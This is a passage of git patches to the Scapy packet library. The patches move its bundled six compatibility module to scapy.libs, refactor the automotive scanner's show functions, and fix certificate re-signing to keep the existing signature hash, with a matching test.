".moves.urllib.error"), "moves.urllib_error", "moves.urllib.error") class Module_six_moves_urllib_request(_LazyModule): - """Lazy loading of moved objects in scapy.modules.six.urllib_request""" + """Lazy loading of moved objects in six.moves.urllib_request""" _urllib_request_moved_attributes = [ @@ -407,7 +421,7 @@ class Module_six_moves_urllib_request(_LazyModule): MovedAttribute("ProxyHandler", "urllib2", "urllib.request"), MovedAttribute("BaseHandler", "urllib2", "urllib.request"), MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"), - MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), # noqa: E501 + MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"), MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"), MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"), @@ -426,20 +440,22 @@ class Module_six_moves_urllib_request(_LazyModule): MovedAttribute("URLopener", "urllib", "urllib.request"), MovedAttribute("FancyURLopener", "urllib", "urllib.request"), MovedAttribute("proxy_bypass", "urllib", "urllib.request"), + MovedAttribute("parse_http_list", "urllib2", "urllib.request"), + MovedAttribute("parse_keqv_list", "urllib2", "urllib.request"), ] for attr in _urllib_request_moved_attributes: setattr(Module_six_moves_urllib_request, attr.name, attr) del attr -Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes # noqa: E501 +Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes -_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), # noqa: E501 +_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), "moves.urllib_request", "moves.urllib.request") class Module_six_moves_urllib_response(_LazyModule): - """Lazy loading of moved objects in scapy.modules.six.urllib_response""" + """Lazy loading of moved objects in six.moves.urllib_response""" _urllib_response_moved_attributes = [ @@ -452,15 +468,15 @@ class Module_six_moves_urllib_response(_LazyModule): setattr(Module_six_moves_urllib_response, attr.name, attr) del attr -Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes # noqa: E501 +Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes -_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), # noqa: E501 +_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), "moves.urllib_response", "moves.urllib.response") class Module_six_moves_urllib_robotparser(_LazyModule): - """Lazy loading of moved objects in scapy.modules.six.urllib_robotparser""" + """Lazy loading of moved objects in six.moves.urllib_robotparser""" _urllib_robotparser_moved_attributes = [ @@ -470,15 +486,15 @@ class Module_six_moves_urllib_robotparser(_LazyModule): setattr(Module_six_moves_urllib_robotparser, attr.name, attr) del attr -Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes # noqa: E501 +Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes -_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"), # noqa: E501 +_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"), "moves.urllib_robotparser", "moves.urllib.robotparser") class Module_six_moves_urllib(types.ModuleType): - """Create a scapy.modules.six.urllib namespace that resembles the Python 3 namespace""" # noqa: E501 + """Create a six.moves.urllib namespace that resembles the Python 3 namespace""" __path__ = [] # mark as package parse = _importer._get_module("moves.urllib_parse") error = _importer._get_module("moves.urllib_error") @@ -494,12 +510,12 @@ def __dir__(self): def add_move(move): - """Add an item to scapy.modules.six.""" + """Add an item to six.moves.""" setattr(_MovedItems, move.name, move) def remove_move(name): - """Remove item from scapy.modules.six.""" + """Remove item from six.moves.""" try: delattr(_MovedItems, name) except AttributeError: @@ -641,13 +657,16 @@ def u(s): import io StringIO = io.StringIO BytesIO = io.BytesIO + del io _assertCountEqual = "assertCountEqual" if sys.version_info[1] <= 1: _assertRaisesRegex = "assertRaisesRegexp" _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" else: _assertRaisesRegex = "assertRaisesRegex" _assertRegex = "assertRegex" + _assertNotRegex = "assertNotRegex" else: def b(s): return s @@ -669,6 +688,7 @@ def indexbytes(buf, i): _assertCountEqual = "assertItemsEqual" _assertRaisesRegex = "assertRaisesRegexp" _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" _add_doc(b, """Byte literal""") _add_doc(u, """Text literal""") @@ -685,6 +705,10 @@ def assertRegex(self, *args, **kwargs): return getattr(self, _assertRegex)(*args, **kwargs) +def assertNotRegex(self, *args, **kwargs): + return getattr(self, _assertNotRegex)(*args, **kwargs) + + if PY3: exec_ = getattr(moves.builtins, "exec") @@ -720,16 +744,7 @@ def exec_(_code_, _globs_=None, _locs_=None): """) -if sys.version_info[:2] == (3, 2): - exec_("""def raise_from(value, from_value): - try: - if from_value is None: - raise value - raise value from from_value - finally: - value = None -""") -elif sys.version_info[:2] > (3, 2): +if sys.version_info[:2] > (3,): exec_("""def raise_from(value, from_value): try: raise value from from_value @@ -809,13 +824,33 @@ def print_(*args, **kwargs): _add_doc(reraise, """Reraise an exception.""") if sys.version_info[0:2] < (3, 4): + # This does exactly the same what the :func:`py3:functools.update_wrapper` + # function does on Python versions after 3.2. It sets the ``__wrapped__`` + # attribute on ``wrapper`` object and it doesn't raise an error if any of + # the attributes mentioned in ``assigned`` and ``updated`` are missing on + # ``wrapped`` object. + def _update_wrapper(wrapper, wrapped, + assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES): + for attr in assigned: + try: + value = getattr(wrapped, attr) + except AttributeError: + continue + else: + setattr(wrapper, attr, value) + for attr in updated: + getattr(wrapper, attr).update(getattr(wrapped, attr, {})) + wrapper.__wrapped__ = wrapped + return wrapper + _update_wrapper.__doc__ = functools.update_wrapper.__doc__ + def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS, updated=functools.WRAPPER_UPDATES): - def wrapper(f): - f = functools.wraps(wrapped, assigned, updated)(f) - f.__wrapped__ = wrapped - return f - return wrapper + return functools.partial(_update_wrapper, wrapped=wrapped, + assigned=assigned, updated=updated) + wraps.__doc__ = functools.wraps.__doc__ + else: wraps = functools.wraps @@ -825,10 +860,22 @@ def with_metaclass(meta, *bases): # This requires a bit of explanation: the basic idea is to make a dummy # metaclass for one level of class instantiation that replaces itself with # the actual metaclass. - class metaclass(meta): + class metaclass(type): def __new__(cls, name, this_bases, d): - return meta(name, bases, d) + if sys.version_info[:2] >= (3, 7): + # This version introduced PEP 560 that requires a bit + # of extra care (we mimic what is done by __build_class__). + resolved_bases = types.resolve_bases(bases) + if resolved_bases is not bases: + d['__orig_bases__'] = bases + else: + resolved_bases = bases + return meta(name, resolved_bases, d) + + @classmethod + def __prepare__(cls, name, this_bases): + return meta.__prepare__(name, bases) return type.__new__(metaclass, 'temporary_class', (), {}) @@ -844,13 +891,75 @@ def wrapper(cls): orig_vars.pop(slots_var) orig_vars.pop('__dict__', None) orig_vars.pop('__weakref__', None) + if hasattr(cls, '__qualname__'): + orig_vars['__qualname__'] = cls.__qualname__ return metaclass(cls.__name__, cls.__bases__, orig_vars) return wrapper +def ensure_binary(s, encoding='utf-8', errors='strict'): + """Coerce **s** to six.binary_type. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> encoded to `bytes` + - `bytes` -> `bytes` + """ + if isinstance(s, binary_type): + return s + if isinstance(s, text_type): + return s.encode(encoding, errors) + raise TypeError("not expecting type '%s'" % type(s)) + + +def ensure_str(s, encoding='utf-8', errors='strict'): + """Coerce *s* to `str`. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + # Optimization: Fast return for the common case. + if type(s) is str: + return s + if PY2 and isinstance(s, text_type): + return s.encode(encoding, errors) + elif PY3 and isinstance(s, binary_type): + return s.decode(encoding, errors) + elif not isinstance(s, (text_type, binary_type)): + raise TypeError("not expecting type '%s'" % type(s)) + return s + + +def ensure_text(s, encoding='utf-8', errors='strict'): + """Coerce *s* to six.text_type. + + For Python 2: + - `unicode` -> `unicode` + - `str` -> `unicode` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + if isinstance(s, binary_type): + return s.decode(encoding, errors) + elif isinstance(s, text_type): + return s + else: + raise TypeError("not expecting type '%s'" % type(s)) + + def python_2_unicode_compatible(klass): """ - A decorator that defines __unicode__ and __str__ methods under Python 2. + A class decorator that defines __unicode__ and __str__ methods under Python 2. Under Python 3 it does nothing. To support Python 2 and 3 with a single code base, define a __str__ method @@ -878,7 +987,7 @@ def python_2_unicode_compatible(klass): # this for some reason.) if sys.meta_path: for i, importer in enumerate(sys.meta_path): - # Here's some real nastiness: Another "instance" of the six module might # noqa: E501 + # Here's some real nastiness: Another "instance" of the six module might # be floating around. Therefore, we can't use isinstance() to check for # the six meta path importer, since the other six instance will have # inserted an importer with different class. diff --git a/scapy/main.py b/scapy/main.py index 12313fed190..869409178cc 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -30,7 +30,7 @@ log_loading, Scapy_Exception, ) -import scapy.modules.six as six +import scapy.libs.six as six from scapy.themes import DefaultTheme, BlackAndWhite, apply_ipython_style from scapy.consts import WINDOWS diff --git a/scapy/modules/krack/crypto.py b/scapy/modules/krack/crypto.py index a4803defb67..2e7b9773538 100644 --- a/scapy/modules/krack/crypto.py +++ b/scapy/modules/krack/crypto.py @@ -6,8 +6,7 @@ from cryptography.hazmat.primitives.ciphers import Cipher, algorithms from cryptography.hazmat.backends import default_backend -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six from scapy.compat import orb, chb from scapy.layers.dot11 import Dot11TKIP from scapy.utils import mac2str diff --git a/scapy/modules/nmap.py b/scapy/modules/nmap.py index cbc623bdfb7..27e61609768 100644 --- a/scapy/modules/nmap.py +++ b/scapy/modules/nmap.py @@ -28,7 +28,7 @@ from scapy.packet import NoPayload from scapy.sendrecv import sr from scapy.compat import plain_str, raw -import scapy.modules.six as six +import scapy.libs.six as six if WINDOWS: diff --git a/scapy/modules/p0f.py b/scapy/modules/p0f.py index d3744038d71..d8f3edc4ace 100644 --- a/scapy/modules/p0f.py +++ b/scapy/modules/p0f.py @@ -22,8 +22,7 @@ from scapy.layers.inet6 import IPv6 from scapy.volatile import RandByte, RandShort, RandString from scapy.error import warning -from scapy.modules.six import integer_types, string_types -from scapy.modules.six.moves import range +from scapy.libs.six import integer_types, string_types _p0fpaths = ["/etc/p0f", "/usr/share/p0f", "/opt/local"] conf.p0f_base = select_path(_p0fpaths, "p0f.fp") diff --git a/scapy/modules/p0fv2.py b/scapy/modules/p0fv2.py index d6ca175eb3f..fe17e16b6ac 100644 --- a/scapy/modules/p0fv2.py +++ b/scapy/modules/p0fv2.py @@ -23,8 +23,7 @@ from scapy.error import warning, Scapy_Exception, log_runtime from scapy.volatile import RandInt, RandByte, RandNum, RandShort, RandString from scapy.sendrecv import sniff -from scapy.modules import six -from scapy.modules.six.moves import map, range +from scapy.libs import six if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 diff --git a/scapy/modules/voip.py b/scapy/modules/voip.py index 420ed641b89..b2c9e2b51ac 100644 --- a/scapy/modules/voip.py +++ b/scapy/modules/voip.py @@ -18,7 +18,6 @@ from scapy.layers.rtp import RTP from scapy.consts import WINDOWS from scapy.config import conf -from scapy.modules.six.moves import range sox_base = (["sox", "-t", ".ul"], ["-", "-t", "ossdsp", "/dev/dsp"]) diff --git a/scapy/packet.py b/scapy/packet.py index 1ecbe5c765a..6fc13165b81 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -47,7 +47,7 @@ pretty_list, EDecimal from scapy.error import Scapy_Exception, log_runtime, warning from scapy.extlib import PYX -import scapy.modules.six as six +import scapy.libs.six as six # Typing imports from scapy.compat import ( diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 873f3a80e9d..fe1ffb22140 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -7,7 +7,7 @@ import os import subprocess import time -import scapy.modules.six as six +import scapy.libs.six as six from threading import Lock, Thread from scapy.automaton import ( diff --git a/scapy/plist.py b/scapy/plist.py index 6eb033f6964..f9e99af567f 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -27,8 +27,7 @@ from scapy.extlib import plt, Line2D, \ MATPLOTLIB_INLINED, MATPLOTLIB_DEFAULT_PLOT_KARGS from functools import reduce -import scapy.modules.six as six -from scapy.modules.six.moves import range, zip +import scapy.libs.six as six # typings from scapy.compat import ( diff --git a/scapy/pton_ntop.py b/scapy/pton_ntop.py index ba023a7726f..e96b30c4255 100644 --- a/scapy/pton_ntop.py +++ b/scapy/pton_ntop.py @@ -14,7 +14,6 @@ import socket import re import binascii -from scapy.modules.six.moves import range from scapy.compat import plain_str, hex_bytes, bytes_encode, bytes_hex from scapy.compat import ( diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 38590ca7831..2d54d7dcd7d 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -7,7 +7,7 @@ import socket import subprocess -from scapy.modules.six.moves.queue import Queue, Empty +from scapy.libs.six.moves.queue import Queue, Empty from scapy.automaton import ObjectPipe from scapy.config import conf from scapy.compat import raw diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index fdd0c3342fc..270476979e8 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -34,7 +34,7 @@ ) from scapy.error import log_runtime, log_interactive, Scapy_Exception from scapy.base_classes import Gen, SetGen -from scapy.modules import six +from scapy.libs import six from scapy.sessions import DefaultSession from scapy.supersocket import SuperSocket, IterSocket diff --git a/scapy/supersocket.py b/scapy/supersocket.py index fa0229758e2..a008482a984 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -21,7 +21,7 @@ from scapy.compat import raw from scapy.error import warning, log_runtime from scapy.interfaces import network_name -import scapy.modules.six as six +import scapy.libs.six as six from scapy.packet import Packet import scapy.packet from scapy.plist import ( diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 2efad8c041b..0b5da233d48 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -28,8 +28,7 @@ import zlib from scapy.consts import WINDOWS -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six from scapy.config import conf from scapy.compat import base64_bytes, bytes_hex, plain_str from scapy.themes import DefaultTheme, BlackAndWhite @@ -71,7 +70,7 @@ class Bunch: def retry_test(func): """Retries the passed function 3 times before failing""" success = False - for _ in six.moves.range(3): + for _ in range(3): try: result = func() except Exception: diff --git a/scapy/tools/automotive/isotpscanner.py b/scapy/tools/automotive/isotpscanner.py index 64ae223f547..1cdbf098e68 100755 --- a/scapy/tools/automotive/isotpscanner.py +++ b/scapy/tools/automotive/isotpscanner.py @@ -13,7 +13,7 @@ from ast import literal_eval -import scapy.modules.six as six +import scapy.libs.six as six from scapy.config import conf from scapy.consts import LINUX diff --git a/scapy/tools/automotive/obdscanner.py b/scapy/tools/automotive/obdscanner.py index 468a43115ab..b5e95df789b 100755 --- a/scapy/tools/automotive/obdscanner.py +++ b/scapy/tools/automotive/obdscanner.py @@ -17,7 +17,7 @@ from ast import literal_eval -import scapy.modules.six as six +import scapy.libs.six as six from scapy.config import conf from scapy.consts import LINUX diff --git a/scapy/utils.py b/scapy/utils.py index 5df7f19f387..6cbd54e9924 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -29,8 +29,8 @@ import time import warnings -import scapy.modules.six as six -from scapy.modules.six.moves import range, input, zip_longest +import scapy.libs.six as six +from scapy.libs.six.moves import range, input, zip_longest from scapy.config import conf from scapy.consts import DARWIN, OPENBSD, WINDOWS diff --git a/scapy/volatile.py b/scapy/volatile.py index 556fd33afc7..5cfbfd3e890 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -22,7 +22,7 @@ from scapy.base_classes import Net from scapy.compat import bytes_encode, chb, plain_str from scapy.utils import corrupt_bits, corrupt_bytes -from scapy.modules.six.moves import zip_longest +from scapy.libs.six.moves import zip_longest from scapy.compat import ( List, diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 96aaac19e1d..ca15042b778 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -15,7 +15,7 @@ from scapy.main import load_layer, load_contrib from scapy.config import conf from scapy.error import log_runtime, Scapy_Exception -import scapy.modules.six as six +import scapy.libs.six as six from scapy.consts import LINUX load_layer("can", globals_dict=globals()) diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index d4536c1bd5f..e647371e663 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -182,7 +182,7 @@ assert e._retry_pkt[EcuState(session=1)] is not None = ServiceEnumerator execute -from scapy.modules.six.moves.queue import Queue +from scapy.libs.six.moves.queue import Queue from scapy.supersocket import SuperSocket class MockISOTPSocket(SuperSocket): diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index cf040351c52..25406776d75 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -7,7 +7,7 @@ = Imports import time from io import BytesIO -import scapy.modules.six as six +import scapy.libs.six as six from scapy.layers.can import * from scapy.contrib.isotp import * from scapy.contrib.isotp.isotp_soft_socket import TimeoutScheduler diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index d11da502d0f..61f57890c69 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -4,7 +4,7 @@ = Import the PNIO RPC layer from scapy.contrib.dce_rpc import * from scapy.contrib.pnio_rpc import * -from scapy.modules.six import itervalues +from scapy.libs.six import itervalues = Check that we have UUIDs diff --git a/test/linux.uts b/test/linux.uts index b75d85c321c..1a9733289c9 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -294,7 +294,7 @@ test_read_routes() ~ linux needs_root from scapy.arch.linux import L3PacketSocket -import scapy.modules.six as six +import scapy.libs.six as six if six.PY3: import mock, socket diff --git a/test/regression.uts b/test/regression.uts index 08a5b45f7ec..ab08c09dce0 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -395,7 +395,7 @@ assert chb(1) == b"\x01" = Pickle and unpickle a packet -import scapy.modules.six as six +import scapy.libs.six as six a = IP(dst="192.168.0.1")/UDP() diff --git a/test/tls.uts b/test/tls.uts index b459e0bbf60..a676d53207f 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1332,7 +1332,7 @@ assert not TLSHelloRequest().tls_session_update(None) = Cryptography module is unavailable -import scapy.modules.six as six +import scapy.libs.six as six import mock @mock.patch("scapy.layers.tls.crypto.suites.get_algs_from_ciphersuite_name") diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index f83c36cfe1c..f447a9b5b53 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -15,7 +15,7 @@ from __future__ import print_function import sys, os, re, time, subprocess -from scapy.modules.six.moves.queue import Queue +from scapy.libs.six.moves.queue import Queue import threading from ast import literal_eval @@ -24,7 +24,7 @@ import sys from contextlib import contextmanager from scapy.autorun import StringWriter -from scapy.modules import six +from scapy.libs import six from scapy.config import conf from scapy.layers.tls.automaton_srv import TLSServerAutomaton @@ -211,7 +211,7 @@ import sys, os, time, threading from scapy.layers.tls.automaton_cli import TLSClientAutomaton from scapy.layers.tls.handshake import TLSClientHello, TLS13ClientHello -from scapy.modules.six.moves.queue import Queue +from scapy.libs.six.moves.queue import Queue send_data = cipher_suite_code = version = None diff --git a/tox.ini b/tox.ini index 04dc18d427a..1f92d6dd669 100644 --- a/tox.ini +++ b/tox.ini @@ -155,5 +155,5 @@ per-file-ignores = scapy/layers/tls/crypto/all.py:F403 scapy/libs/winpcapy.py:F405,F403,E501 scapy/tools/UTscapy.py:E501 -exclude = scapy/modules/six.py, +exclude = scapy/libs/six.py, scapy/libs/ethertypes.py From d74d8601575464a017f6e0f0031403b8c18d4429 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 23 Mar 2022 14:06:25 +0100 Subject: [PATCH 0757/1632] Minor refactoring of Automotive-Scanner show functions --- .../contrib/automotive/scanner/enumerator.py | 66 +++++++------------ .../automotive/scanner/staged_test_case.py | 17 ++--- scapy/contrib/automotive/scanner/test_case.py | 20 +++--- 3 files changed, 39 insertions(+), 64 deletions(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 5e47008c9c8..dd111e37033 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -469,8 +469,8 @@ def _compute_statistics(self): return stats - def _show_statistics(self, dump=False): - # type: (bool) -> Union[str, None] + def _show_statistics(self, **kwargs): + # type: (Any) -> str stats = self._compute_statistics() s = "%d requests were sent, %d answered, %d unanswered" % \ @@ -482,11 +482,7 @@ def _show_statistics(self, dump=False): s += make_lined_table(stats, lambda x: x, dump=True, sortx=str, sorty=str) or "" - if dump: - return s + "\n" - else: - print(s) - return None + return s + "\n" def _prepare_negative_response_blacklist(self): # type: () -> None @@ -572,8 +568,8 @@ def results_without_response(self): """ return [r for r in self._results if r.resp is None] - def _show_negative_response_details(self, dump=False): - # type: (bool) -> Optional[str] + def _show_negative_response_details(self, **kwargs): + # type: (Any) -> str nrc_dict = defaultdict(int) # type: Dict[int, int] for nr in self.results_with_negative_response: nrc_dict[self._get_negative_response_code(nr.resp)] += 1 @@ -585,67 +581,56 @@ def _show_negative_response_details(self, dump=False): nrc, self._get_negative_response_desc(nrc), nr_count) s += "\n" - if dump: - return s + "\n" - else: - print(s) - return None + return s + "\n" - def _show_negative_response_information(self, dump, filtered=True): - # type: (bool, bool) -> Optional[str] + def _show_negative_response_information(self, **kwargs): + # type: (Any) -> str + filtered = kwargs.get("filtered", True) s = "%d negative responses were received\n" % \ len(self.results_with_negative_response) - if not dump: - print(s) - s = "" - else: - s += "\n" + s += "\n" - s += self._show_negative_response_details(dump) or "" + "\n" + s += self._show_negative_response_details(**kwargs) or "" + "\n" if filtered and len(self.negative_response_blacklist): s += "The following negative response codes are blacklisted: %s\n"\ % [self._get_negative_response_desc(nr) for nr in self.negative_response_blacklist] - if dump: - return s + "\n" - else: - print(s) - return None + return s + "\n" - def _show_results_information(self, dump, filtered): - # type: (bool, bool) -> Optional[str] + def _show_results_information(self, **kwargs): + # type: (Any) -> str def _get_table_entry( tup # type: _AutomotiveTestCaseScanResult ): # type: (...) -> Tuple[str, str, str] return self._get_table_entry_x(tup), \ self._get_table_entry_y(tup), \ self._get_table_entry_z(tup) + + filtered = kwargs.get("filtered", True) s = "=== No data to display ===\n" data = self._results if not filtered else self.filtered_results # type: Union[List[_AutomotiveTestCaseScanResult], List[_AutomotiveTestCaseFilteredScanResult]] # noqa: E501 if len(data): s = make_lined_table( - data, _get_table_entry, dump=dump, sortx=str) or "" + data, _get_table_entry, dump=True, sortx=str) or "" - if dump: - return s + "\n" - else: - print(s) - return None + return s + "\n" def show(self, dump=False, filtered=True, verbose=False): # type: (bool, bool, bool) -> Optional[str] if filtered: self._prepare_negative_response_blacklist() - s = self._show_header(dump) or "" - s += self._show_statistics(dump) or "" - s += self._show_negative_response_information(dump, filtered) or "" - s += self._show_results_information(dump, filtered) or "" + show_functions = [self._show_header, + self._show_statistics, + self._show_negative_response_information, + self._show_results_information] if verbose: - s += self._show_state_information(dump) or "" + show_functions.append(self._show_state_information) + + s = "\n".join(x(filtered=filtered) for x in show_functions) if dump: return s + "\n" @@ -671,7 +656,6 @@ def _get_label(self, response, positive_case="PR: PositiveResponse"): @property def supported_responses(self): # type: () -> List[EcuResponse] - supported_resps = list() all_responses = [p for p in self.__result_packets.values() if orb(bytes(p)[0]) & 0x40] diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py index 6c8d547f3f7..0a88f58747c 100644 --- a/scapy/contrib/automotive/scanner/staged_test_case.py +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -215,25 +215,20 @@ def post_execute(self, socket, state, global_configuration) @staticmethod - def _show_headline(headline, sep="=", dump=False): - # type: (str, str, bool) -> Optional[str] + def _show_headline(headline, sep="="): + # type: (str, str) -> str s = "\n\n" + sep * (len(headline) + 10) + "\n" s += " " * 5 + headline + "\n" s += sep * (len(headline) + 10) + "\n" - - if dump: - return s + "\n" - else: - print(s) - return None + return s + "\n" def show(self, dump=False, filtered=True, verbose=False): # type: (bool, bool, bool) -> Optional[str] - s = self._show_headline("AutomotiveTestCase Pipeline", "=", dump) or "" + s = self._show_headline("AutomotiveTestCase Pipeline", "=") for idx, t in enumerate(self.__test_cases): s += self._show_headline( - "AutomotiveTestCase Stage %d" % idx, "-", dump) or "" - s += t.show(dump, filtered, verbose) or "" + "AutomotiveTestCase Stage %d" % idx, "-") + s += t.show(True, filtered, verbose) or "" if dump: return s + "\n" diff --git a/scapy/contrib/automotive/scanner/test_case.py b/scapy/contrib/automotive/scanner/test_case.py index 757541d3e2a..58ef38007c7 100644 --- a/scapy/contrib/automotive/scanner/test_case.py +++ b/scapy/contrib/automotive/scanner/test_case.py @@ -191,33 +191,29 @@ def post_execute(self, socket, state, global_configuration): # type: (_SocketUnion, EcuState, AutomotiveTestCaseExecutorConfiguration) -> None # noqa: E501 pass - def _show_header(self, dump=False): - # type: (bool) -> Optional[str] + def _show_header(self, **kwargs): + # type: (Any) -> str s = "\n\n" + "=" * (len(self._description) + 10) + "\n" s += " " * 5 + self._description + "\n" s += "-" * (len(self._description) + 10) + "\n" - if dump: - return s + "\n" - else: - print(s) - return None + return s + "\n" - def _show_state_information(self, dump): - # type: (bool) -> Optional[str] + def _show_state_information(self, **kwargs): + # type: (Any) -> str completed = [(state, self._state_completed[state]) for state in self.scanned_states] return make_lined_table( completed, lambda tup: ("Scan state completed", tup[0], tup[1]), - dump=dump) + dump=True) or "" def show(self, dump=False, filtered=True, verbose=False): # type: (bool, bool, bool) -> Optional[str] - s = self._show_header(dump) or "" + s = self._show_header() if verbose: - s += self._show_state_information(dump) or "" + s += self._show_state_information() if dump: return s + "\n" From 02d09a4f792f06e4692d985bc38cf4b71f08f738 Mon Sep 17 00:00:00 2001 From: bezvan Date: Tue, 29 Mar 2022 14:19:18 +0200 Subject: [PATCH 0758/1632] Merge pull request #3525 from bezvan/patch-1 Use current signature hash when resigning cert --- scapy/layers/tls/cert.py | 2 +- test/cert.uts | 13 +++++++++++-- 2 files changed, 12 insertions(+), 3 deletions(-) diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index fa3d5b68289..9b9e972d777 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -445,7 +445,7 @@ def signTBSCert(self, tbsCert, h="sha256"): def resignCert(self, cert): """ Rewrite the signature of either a Cert or an X509_Cert. """ - return self.signTBSCert(cert.tbsCertificate) + return self.signTBSCert(cert.tbsCertificate, h=None) def verifyCert(self, cert): """ Verifies either a Cert or an X509_Cert. """ diff --git a/test/cert.uts b/test/cert.uts index 4a89661aa98..eb0fa44badb 100644 --- a/test/cert.uts +++ b/test/cert.uts @@ -224,10 +224,19 @@ aomWcyGW1mRxNJUI0GQ5EHB5Vvy4mcxKG1DMYxG/rGf/EHk+xPJXpITIugbispbm uA== -----END CERTIFICATE----- """) +# tbs_signed's signature computed using sha256 by default (while signature algorithm is sha1 in c_tosign) tbs_signed = pkey_sign.signTBSCert(c_tosign.tbsCertificate) assert raw(tbs_signed.signatureValue) == b"BH\xdb@>\x82\x08b\xbc\xaf\x04%_\xeaV\xf5_\xa8\xf4\xf3\xd1\x0f\x86\xbd\x1b\xe2U\xfb\xf5/\rN\xc2\r\xbc\xa0Hn\xed\xb7\x18\xb2\xb3\xa5\x08m9\x9fY\xa6\xb32\xcd:\xd7\xab\xac\x8c\xcf@\xbb\x08Gt2\xb7\x93\x95\x92\x17\xa7j\x99\xa7)\xab\xbc\x07HP\xca\x00M$\xfb.\xb9\xb8\xac%i\x8c\xa2+\xe7ny!\xa1\xd2l\x0f>j\xd6\xb0\x9e\xcat)+\xbc\x16'\x9d\x1e\x80\x89\x01.\x9dS\xbb\xa0-\xb8\x0c\xe9\xe9:a\xbe\x14p\xd1\xbb\xf0I\xa2\x8fio`2\x1b7\xb8]\t3\xced`\x86\x97\x01\x82t\xd0\xc3c%\xa7\xda\\[]9\xfa\xba\r\x83\x8b\r\xa2(\x87\xe87C\xb7\\\x11\x163\x8e\xbf\xe2\x80\x7f\xf2\x93\xa4\x04w\xddG\x88\x1e#\xa6l\x15\xa1\xc6\xda\x1f\xd4\xb4$T\xa1\xd0\xe9\xd5t\xc4\xe4q\xbe\xa2\xd2\xba\x1b!/\x1dK\x17}\xc6.\xba\x81;\x00ft\x8du)\x15\n\t\x08\x1b\xb2Ol\xe1\x94g\xc8\xc0\xd6>" -pkey_sign.resignCert(c_tosign) -assert pkey_sign.verifyCert(c_tosign) + += PrivKey class : resign cert + +# Keep the correct cert signature but set a dummy value to make sure signature is recomputed +correct_sha1_sig = c_tosign.signatureValue +c_tosign.x509Cert.signatureValue.val = 512*'0' + +c_resigned = pkey_sign.resignCert(c_tosign) +assert pkey_sign.verifyCert(c_resigned) +assert raw(c_resigned.signatureValue) == correct_sha1_sig ########### 